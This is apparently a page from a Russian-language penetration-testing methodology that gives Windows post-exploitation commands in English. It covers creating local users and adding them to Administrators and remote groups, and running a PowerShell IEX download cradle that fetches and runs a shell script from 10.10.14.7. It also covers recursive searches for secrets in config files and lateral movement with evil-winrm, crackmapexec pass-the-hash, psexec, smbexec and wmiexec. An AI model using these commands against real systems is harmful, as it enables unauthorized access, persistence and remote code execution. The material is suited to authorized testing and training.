Перейти к основному содержимому

Общее: Windows

:::tip Формат страницы

Порядок действий описан по‑русски. В методике сохранены заголовки (частично локализованы типовые термины), таблицы, иллюстрации и блоки кода: команды и параметры на английском, без перевода синтаксиса.

:::

Порядок действий

  1. Определите ОС и ограничения среды.
  2. Следуйте разделу для типовых приёмов и команд.
  3. Фиксируйте вывод для отчёта.
  4. Блоки кода — на английском.

Методика

User

Creating a user

net user <USERNAME> <PASSWORD> /add

Add a user to a group

net localgroup Administrators <USERNAME> /add

Add a user to the RDP group

net localgroup "Remote Management Users" <USERNAME> /add

Powershell credentials and how to use them

# Storing the credentials as variables
$pass = ConvertTo-SecureString '<PASSWORD>' -asplaintext -force
$cred = New-Object System.Management.Automation.PSCredential('<USERNAME>', $pass)
# Launch a process
Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.7:5555/shell-admin.ps1')" -Credential $cred

Recursive Grep (Powershell)

Get-ChildItem -Recurse [-Include *.config,*.txt,*.ini] [-Exclude *.dll,*.exe,*.jar] | Select-String "<STRING>" -List | Select-Object -ExpandProperty Path | Out-String
# Shorter version
dir -recurse *.* | sls -pattern "foobar" | select -unique path

Remote Command Execution

WinRM

(Get-PSSessionConfiguration -Name Microsoft.PowerShell).Permission
# If the service is disable, you can enable with the following command
Enable-PSRemoting -Force  
$pass = ConvertTo-SecureString '<PASSWORD>' -asplaintext -force
$cred = New-Object System.Management.Automation.PSCredential('<USERNAME>', $pass)
Enter-PSSession -Computername <IP> -Credential <CRENTIAL>
evil-winrm -u USERNAME {-p <PASSWORD> | -H <HASH>} -i TARGET_IP
crackmapexec winrm <IP> -d <Domain Name> -u <USER> {-H <HASH> | -p <PASSWORD>} -X 'whoami'

Remote Desktop (RDP)

rdesktop -u <USER> -p '<PASSWORD>' <IP>
xfreerdp +compression +toggle-fullscreen +clipboard /cert-ignore /dynamic-resolution  /u:<USERNAME> /p:'<PASSWORD>' /v:IP
> impacket-tstool.py '<DOMAIN>/<USERNAME>:<PASSWORD>'@<IP> qwinsta
> SESSIONNAME  USERNAME                 ID  STATE         Desktop   ConnectTime          DisconnectTime
> ============ ======================== === ============= ========= ==================== ====================
> Services                              0   Disconnected            None                 None
> Console                               1   Connected     Locked    2025/03/02 13:52:43  None
> RDP-Tcp#0    .\Administrator          2   Active        Unlocked  2025/03/03 07:23:07  2025/03/03 07:23:07
> ```

### PSEXEC

```bash
psexec.py [-hashes <LM:NT>] <DOMAIN>/<USERNAME>[:<PASSWORD]@<TARGET>

SmbExec

smbexec.py [-hashes <LM:NT>] <DOMAIN>/<USERNAME>[:<PASSWORD]@<TARGET>

Crackmapexec

# Execute Powershell
crackmapexec smb 10.10.10.10 -u '<username>' -p '<password>' -X '$PSVersionTable' 
# Excute command
crackmapexec smb 10.10.10.10 -u '<username>' -p '<password>' -x whoami 
# Pass-the-Hash
crackmapexec smb 10.10.10.10 -u '<username>' -H <NTHASH> -x whoami

WMiexec

wmiexec.py [-hashes <LM:NT>] <DOMAIN>/<USERNAME>[:<PASSWORD]@<TARGET>